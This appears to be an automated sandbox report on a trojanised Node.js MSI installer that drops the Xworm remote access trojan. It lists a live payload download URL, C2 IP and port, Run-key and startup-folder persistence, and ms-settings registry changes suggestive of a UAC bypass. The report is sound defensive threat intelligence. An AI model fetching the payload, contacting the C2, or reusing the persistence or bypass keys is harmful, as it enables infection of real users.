xworm | 9eea480bd30c98ae11a97cb89a9278235cbbbd03c171ee5e5198bd86b7965b4b

Resubmissions

08/12/2024, 19:39

241208-ydbvaaxrbp 6

08/12/2024, 19:07

241208-xsvp9sxkgm 10

Analysis

max time kernel
1046s
max time network
1053s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08/12/2024, 19:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

node-v22.11.0-x64.msi
Size

28.9MB
MD5

fa9e1f3064a66913362e9bff7097cef5
SHA1

b34f1f9a9f6242c54486a4bc453a9336840b4425
SHA256

9eea480bd30c98ae11a97cb89a9278235cbbbd03c171ee5e5198bd86b7965b4b
SHA512

ad3e9469326dccac6b49185b5b2814ba700b5d83b4b3ce17f85a9adc5f90bdebf54d79800b253ed5c371ab82d27304841f86ab1a8a3c7ffade8a2d78e55dc99f
SSDEEP

786432:EtShU+9S49htlhk3tKuiU9IsO9IP1/lBMS8k4:EAUK/U9IN961/l

Score

10^/10

xworm defense_evasion discovery execution persistence phishing privilege_escalation rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/michealjames96/robIox-cdn/raw/refs/heads/main/Onedrive.exe

Extracted

Family

xworm

127.0.0.1:10025

147.185.221.24:10025

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000b000000032918-18027.dat	family_xworm
behavioral1/memory/3480-18033-0x0000000000FC0000-0x0000000000FEE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	2796	msiexec.exe
3	2796	msiexec.exe
82	564	powershell.exe
83	564	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Onedrive.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	Onedrive.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Onedrive = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Onedrive.exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5856	powershell.exe
564	powershell.exe

Downloads MZ/PE file

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
33	raw.githubusercontent.com
80	raw.githubusercontent.com
81	discord.com
83	raw.githubusercontent.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\debug\node_modules\ms\package.json	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\Australia\is-SAE2Q.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\is-J0RV9.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\doc\is-B2MB4.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\ftplugin\is-CFVHP.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\mkdirp\dist\cjs\src\path-arg.d.ts.map	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\is-JKPLJ.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\lib\openssl\engines-3\is-1HTII.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\gtk-doc\html\p11-kit\is-URR2T.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\encodings\sbcs-data.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\jackspeak\LICENSE.md	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\Asia\is-PG75Q.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\share\doc\git-doc\is-86VPR.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\perl5\core_perl\unicore\lib\Age\is-LTKGE.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\man\man5\npm-json.5	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\mute-stream\package.json	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\LICENSE	msiexec.exe
File created	C:\Program Files\Git\usr\share\vim\vim91\ftplugin\is-J7LL7.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\signal-exit\dist\cjs\package.json	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\encoding\is-SPFAP.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\msgs\is-EC0QO.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\Africa\is-64K3I.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\bin\is-F1V98.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\compiler\is-T7KT3.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\syntax\is-PNFCD.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\nodevars.bat	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tk8.6\demos\is-SH3JI.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\perl5\core_perl\unicore\To\is-D59EF.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\perl5\core_perl\unicore\lib\Lb\is-6NU3O.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\terminfo\78\is-99MQQ.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\lang\is-E77JV.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\ip-address\dist\ip-address.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi-cjs\node_modules\ansi-styles\license	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\Pacific\is-L54Q7.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\share\doc\xz\api\is-D79HB.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\tutor\is-VJ40N.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\node_modules\tar\dist\esm\symlink-error.js	msiexec.exe
File created	C:\Program Files\Git\mingw64\bin\is-F1U0A.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\lib\tcl8.6\tzdata\Asia\is-8FKM5.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\share\licenses\curl\is-H7JPG.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\ftplugin\is-T5Q49.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\lang\cs\LC_MESSAGES\is-S9ULA.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\fetch.js	msiexec.exe
File created	C:\Program Files\Git\usr\bin\is-EC42D.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\gnupg\is-4E86T.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\keymap\is-C4OCA.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\lang\is-EPE7G.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\LICENSE	msiexec.exe
File created	C:\Program Files\Git\usr\share\terminfo\78\is-RS4OF.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\plugin\is-D7S4F.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\syntax\is-AU4D4.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\etc\gitconfig.lock	git.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\agent\lib\errors.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\tar\lib\read-entry.js	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tk8.6\demos\is-IKNER.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\doc\is-LU0UO.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\syntax\is-JA7OA.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\tutor\is-SRUCU.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\perl5\vendor_perl\URI\is-7EF0U.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\usr\share\vim\vim91\ftplugin\is-5J921.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\parser.js	msiexec.exe
File created	C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\dist\esm\retry-busy.d.ts.map	msiexec.exe
File created	C:\Program Files\Git\mingw64\lib\tk8.6\demos\is-HUTRB.tmp	Git-2.47.1-64-bit.tmp
File created	C:\Program Files\Git\mingw64\share\licenses\gcc-libs\is-0GUHN.tmp	Git-2.47.1-64-bit.tmp

Drops file in Windows directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID32F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF958.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d1a8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID2D1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID8DD.tmp	msiexec.exe
File created	C:\Windows\Installer\e57d1aa.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB5D.tmp	msiexec.exe
File created	C:\Windows\Installer\e57d1a8.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF0BC5F0BAA511A72A.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}\NodeIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DF9982DE5FD184C3AB.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF536E49BF181D5647.TMP	msiexec.exe
File created	C:\Windows\Installer\SourceHash{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}	msiexec.exe
File created	C:\Windows\SystemTemp\~DF46EBB701B3AE0AC1.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDA46.tmp	msiexec.exe
File created	C:\Windows\Installer\{A6C2B110-5934-4A7F-B8C1-51E7CD51FF82}\NodeIcon	msiexec.exe

Executes dropped EXE 64 IoCs

pid	Process
5080	node.exe
1180	node.exe
428	node.exe
4876	node.exe
3684	Git-2.47.1-64-bit.exe
3280	Git-2.47.1-64-bit.tmp
3008	git.exe
5996	git.exe
4308	git.exe
3616	git.exe
4216	git.exe
1608	git.exe
4524	git.exe
6016	git.exe
1232	git.exe
484	git.exe
5344	git.exe
3932	git.exe
3112	git.exe
2012	git.exe
6052	git.exe
5528	git.exe
4232	scalar.exe
820	scalar.exe
3908	bash.exe
2828	bash.exe
1928	bash.exe
1572	ln.exe
4516	bash.exe
2160	cygpath.exe
4876	bash.exe
3316	expr.exe
5244	bash.exe
4968	cp.exe
5168	bash.exe
1164	cygpath.exe
4696	bash.exe
2032	expr.exe
1416	bash.exe
5568	cp.exe
2840	bash.exe
1644	cygpath.exe
5404	bash.exe
4304	expr.exe
5560	bash.exe
1564	cp.exe
5204	bash.exe
2372	cygpath.exe
4492	bash.exe
4184	expr.exe
1056	bash.exe
764	cp.exe
5788	bash.exe
3304	rm.exe
4296	node.exe
4240	node.exe
3000	node.exe
5200	node.exe
4540	git.exe
2444	git.exe
2520	git.exe
4380	git-remote-https.exe
2396	git.exe
200	git.exe

Loads dropped DLL 64 IoCs

pid	Process
5632	MsiExec.exe
5632	MsiExec.exe
2328	MsiExec.exe
2328	MsiExec.exe
2328	MsiExec.exe
976	MsiExec.exe
6032	MsiExec.exe
3008	git.exe
3008	git.exe
3008	git.exe
3008	git.exe
3008	git.exe
5996	git.exe
5996	git.exe
5996	git.exe
5996	git.exe
5996	git.exe
4308	git.exe
4308	git.exe
4308	git.exe
4308	git.exe
4308	git.exe
3616	git.exe
3616	git.exe
3616	git.exe
3616	git.exe
3616	git.exe
3616	git.exe
4216	git.exe
4216	git.exe
4216	git.exe
4216	git.exe
4216	git.exe
4216	git.exe
1608	git.exe
1608	git.exe
1608	git.exe
1608	git.exe
1608	git.exe
4524	git.exe
4524	git.exe
4524	git.exe
4524	git.exe
4524	git.exe
6016	git.exe
6016	git.exe
6016	git.exe
6016	git.exe
6016	git.exe
1232	git.exe
1232	git.exe
1232	git.exe
1232	git.exe
1232	git.exe
484	git.exe
484	git.exe
484	git.exe
484	git.exe
484	git.exe
5344	git.exe
5344	git.exe
5344	git.exe
5344	git.exe
5344	git.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Git-2.47.1-64-bit.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
2796	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Git-2.47.1-64-bit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Git-2.47.1-64-bit.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000097e32746e391c5270000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000097e327460000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090097e32746000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d97e32746000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000097e3274600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitmodules\Content Type = "text/plain"	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\background\shell\git_shell\Icon = "C:\\Program Files\\Git\\git-bash.exe"	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\background\shell\git_gui\command\ = "\"C:\\Program Files\\Git\\cmd\\git-gui.exe\" \"--working-dir\" \"%v.\""	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sh_auto_file\shell\open\command\ = "\"C:\\Program Files\\Git\\git-bash.exe\" --no-cd \"%L\" %*"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitmodules\PerceivedType = "text"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shell\git_shell\command	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell\open\command\ = "C:\\WindowsApi\\52e8692e75c631390adc1f931d431f808cde0d53.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitignore\ = "txtfile"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sh_auto_file	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\Background\shell\git_gui	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sh_auto_file\ShellEx\DropHandler	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\background	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\git_gui\Icon = "C:\\Program Files\\Git\\cmd\\git-gui.exe"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\Background\shell\git_gui	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\corepack	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\Background\shell\git_gui\command	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\EnvironmentPathNpmModules = "EnvironmentPath"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\git_gui	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\.gitmodules	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.sh	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\sh_auto_file\ShellEx\DropHandler	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\background\shell\git_shell\Icon = "C:\\Program Files\\Git\\git-bash.exe"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\background\shell	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\git_gui\ = "Open Git &GUI here"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell\open	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\git_shell\Icon = "C:\\Program Files\\Git\\git-bash.exe"	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\background\shell\git_gui\Icon = "C:\\Program Files\\Git\\cmd\\git-gui.exe"	Git-2.47.1-64-bit.tmp
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sh_auto_file\ShellEx\DropHandler\ = "{60254CA5-953B-11CF-8C96-00AA00B8708C}"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitattributes\ = "txtfile"	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\NodeRuntime	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\EnvironmentPath	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\background\shell\git_gui\command\ = "\"C:\\Program Files\\Git\\cmd\\git-gui.exe\" \"--working-dir\" \"%v.\""	Git-2.47.1-64-bit.tmp
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitattributes\PerceivedType = "text"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\MACHINE\Software\Classes\sh_auto_file	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\LibraryFolder\background\shell\git_shell\ = "Open Git Ba&sh here"	Git-2.47.1-64-bit.tmp
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell	reg.exe
